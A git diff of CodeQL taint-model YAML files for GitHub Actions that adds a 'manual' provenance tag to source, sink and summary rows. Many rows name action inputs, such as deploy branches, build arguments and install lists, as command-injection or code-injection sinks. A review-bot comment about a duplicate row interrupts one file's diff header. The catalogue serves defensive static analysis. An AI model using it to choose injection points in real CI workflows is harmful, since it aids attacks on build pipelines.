diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
index 9d9eac38af01..0352ece87b52 100644
--- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"]
+ - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
index 4c74301d1c35..712f2ce3395c 100644
--- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"]
- - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"]
- - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"]
- - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"]
\ No newline at end of file
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection", "manual"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml
index 0534d299627b..45c00c1c30ea 100644
--- a/ql/lib/ext/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/gradle_gradle-build-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"]
- - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"]
- - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"]
+ - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint", "manual"]
diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml
index a8a528b85c5a..8f05918155ed 100644
--- a/ql/lib/ext/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/haya14busa_action-cond.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"]
- - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"]
+ - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
+ - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml
index 6a907fcc3a19..708c310c05f4 100644
--- a/ql/lib/ext/hexlet_project-action.model.yml
+++ b/ql/lib/ext/hexlet_project-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"]
+ - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
index 6332cbfdad8e..761776358994 100644
--- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"]
- - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"]
- - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"]
- - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"]
\ No newline at end of file
+ - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection", "manual"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
index f8b8490c2135..7106115c17a2 100644
--- a/ql/lib/ext/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ilammy/setup-nasm", "*", "input.version", "command-injection"]
- - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"]
+ - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
+ - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
index 64024ef5c72d..366e5dd17667 100644
--- a/ql/lib/ext/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"]
- - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"]
- - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"]
\ No newline at end of file
+ - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
index 1771ac2bad05..a469063fc503 100644
--- a/ql/lib/ext/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["iterative/setup-cml", "*", "input.version", "command-injection"]
+ - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
index e8600c6f7df5..d0d5b57574b5 100644
--- a/ql/lib/ext/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["iterative/setup-dvc", "*", "input.version", "command-injection"]
+ - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
index 2ab70905db16..3151e335d22d 100644
--- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"]
- - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection", "manual"]
+ - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection", "manual"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index 2e5b0d42efdc..38253b689340 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"]
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
index 948be24b45cd..0930fc246c38 100644
--- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"]
+ - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml
index f1a04c9e2441..5b344799ad95 100644
--- a/ql/lib/ext/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/jsdaniell_create-json.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"]
- - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"]
- - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"]
+ - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
+ - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"]
+ - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml
index 928c1f918d3f..5b6f1342fc42 100644
--- a/ql/lib/ext/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/jurplel_install-qt-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["jurplel/install-qt-action", "*", "input.version", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"]
- - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"]
+ - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.dir", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection", "manual"]
+ - ["jurplel/install-qt-action", "*", "input.extra", "command-injection", "manual"]
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
index ad95f1f323a7..b34833d85f3a 100644
--- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"]
+ - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"]
- - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"]
- - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"]
+ - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
+ - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"]
+ - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection", "manual"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index 18339bfa4e9b..bbfc0bed1dfb 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]
- - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"]
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
index abfca93b4ec9..74ef5820cb7a 100644
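Review bot: The khan/pull-request-comment-trigger hunk keeps two identical rows on the new side — `output.comment_body` / "Comment body" appears twice in the sourceModel data — and the commit re-tags both instead of dropping one. The duplicate adds nothing to the analysis and makes the model read as if it covered two distinct outputs; presumably the second row was meant for a different output or is a copy-paste leftover. Keep a single row, `- ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"]`, and adjust the hunk's line count accordingly.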
--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"]
+ - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml
index b3cb5aa39407..e05a3afd63a5 100644
--- a/ql/lib/ext/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"]
- - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"]
+ - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
+ - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
index a84880cfdf10..a96ad45d624e 100644
--- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"]
+ - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
index f32484a4f0d3..a70e8facf7c1 100644
--- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"]
\ No newline at end of file
+ - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index 57c35c902141..66280f8bdd64 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"]
- - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"]
\ No newline at end of file
+ - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
+ - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
index 9ce43e68a757..65965daeb1d4 100644
--- a/ql/lib/ext/magefile_mage-action.model.yml
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["magefile/mage-action", "*", "input.args", "command-injection"]
+ - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
index ac3aaa67def0..ba9a04f588bf 100644
--- a/ql/lib/ext/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["maierj/fastlane-action", "*", "input.lane", "command-injection"]
- - ["maierj/fastlane-action", "*", "input.options", "command-injection"]
- - ["maierj/fastlane-action", "*", "input.env", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
+ - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"]
+ - ["maierj/fastlane-action", "*", "input.env", "command-injection", "manual"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
index 90fd673c705b..aea054e24b0a 100644
--- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"]
- - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"]
- - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"]
- - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection", "manual"]
+ - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection", "manual"]
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml
index 9f621758cffb..7a556a0f0ece 100644
--- a/ql/lib/ext/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/marocchino_on_artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"]
+ - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml
index 2c9f46b46f45..bb1c3ffca2a0 100644
--- a/ql/lib/ext/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/mattdavis0351_actions.model.yml
@@ -3,14 +3,14 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"]
- - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"]
+ - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
+ - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"]
- - ["mattdavis0351/actions", "*", "input.tag", "command-injection"]
+ - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.image-name", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection", "manual"]
+ - ["mattdavis0351/actions", "*", "input.tag", "command-injection", "manual"]
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
index 1bcf8e7ce7ab..d3bec5ea39d0 100644
--- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"]
+ - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
index dfa441761ab3..c65527150b5c 100644
--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"]
+ - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml
index 817067445681..25565b445fca 100644
--- a/ql/lib/ext/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"]
- - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"]
+ - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
+ - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"]
diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
index 182977098389..d46a07dde969 100644
--- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"]
+ - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
index aeca6db0d98d..2d162fbc9147 100644
--- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -3,14 +3,14 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"]
- - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"]
\ No newline at end of file
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection", "manual"]
+ - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
index b9358bd2d69a..fc91bacdb72d 100644
--- a/ql/lib/ext/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["msys2/setup-msys2", "*", "input.install", "command-injection"]
- - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"]
\ No newline at end of file
+ - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
+ - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
index a18319954e3b..8b2b4e79afa5 100644
--- a/ql/lib/ext/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"]
- - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
+ - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"]
